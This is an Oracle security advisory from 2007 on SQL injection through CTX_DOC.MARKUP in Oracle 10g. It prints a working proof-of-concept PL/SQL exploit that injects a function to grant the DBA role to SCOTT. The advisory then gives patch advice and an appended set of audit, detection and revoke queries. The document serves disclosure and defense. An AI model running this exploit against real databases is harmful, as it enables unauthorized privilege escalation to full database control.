SQL Injection via Oracle CTX_DOC.Markup in Oracle 10g
Details

The following proof-of-concept exploit code injects a function into ctx_doc and grants the DBA role to the user SCOTT. This exploit works on Oracle 10g.

Example

    -- Helper function: invoker rights (authid current_user), own transaction
    CREATE OR REPLACE FUNCTION HACKIT return varchar2
    authid current_user as
    pragma autonomous_transaction;
    BEGIN
      EXECUTE IMMEDIATE 'grant dba to scott';
      COMMIT;
      RETURN '';
    END;
    /

    set serveroutput on

    -- Test table with an Oracle Text context index
    create table mark_tab (id number primary key, text varchar2(80) );
    insert into mark_tab values ('1', 'All your bases are belong to US');
    create index mark_tab_idx on mark_tab(text) indextype is ctxsys.context parameters ('filter ctxsys.null_filter');

    SET SERVEROUTPUT ON;

    -- The function call is concatenated into the third argument of CTX_DOC.MARKUP
    DECLARE
      mklob CLOB;
      amt NUMBER := 40;
      line VARCHAR2(80);
    BEGIN
      CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob);
      DBMS_LOB.READ(mklob, amt, 1, line);
      DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line);
      DBMS_LOB.FREETEMPORARY(mklob);
    END;
    /

Patch Information

Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update October 2007.

© 2007 by Red-Database-Security GmbH - last update 28-nov-2007
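One way to carry out the "Revoke the grants" step from Patch Information and to check whether the proof of concept has already been run against a database. This is an added example, not part of the original advisory. It assumes a DBA session in SQL*Plus; the excluded schema list in query 3 and the PUBLIC grantee in step 4 are illustrative assumptions.

```sql
-- Added audit example (not from the original advisory). Run as a DBA.

-- 1. Who can execute CTXSYS.CTX_DOC? Every grantee listed here can reach
--    the MARKUP procedure used in the proof of concept.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'CTXSYS'
   AND table_name = 'CTX_DOC'
 ORDER BY grantee;

-- 2. Who holds the DBA role? Compare with the accounts that are supposed
--    to hold it; the proof of concept leaves SCOTT in this list.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- 3. Stored code that combines an autonomous transaction with dynamic SQL,
--    the shape of the HACKIT helper. The excluded owners are an assumption;
--    extend the list with the schemas of installed Oracle components.
SELECT DISTINCT s.owner, s.name, s.type
  FROM dba_source s
 WHERE s.owner NOT IN ('SYS', 'SYSTEM', 'CTXSYS')
   AND UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%'
   AND EXISTS (SELECT 1
                 FROM dba_source e
                WHERE e.owner = s.owner
                  AND e.name  = s.name
                  AND e.type  = s.type
                  AND UPPER(e.text) LIKE '%EXECUTE IMMEDIATE%')
 ORDER BY s.owner, s.name;

-- 4. Mitigation named in the advisory: revoke the grant from every grantee
--    in query 1 that does not need CTX_DOC. PUBLIC is shown as an example
--    grantee (assumption); use the rows query 1 actually returned.
REVOKE EXECUTE ON ctxsys.ctx_doc FROM PUBLIC;

-- 5. Clean-up if query 2 shows the grant made by the proof of concept.
REVOKE dba FROM scott;
```

Schemas that legitimately call CTX_DOC need a direct EXECUTE grant after step 4, so record the output of query 1 before revoking.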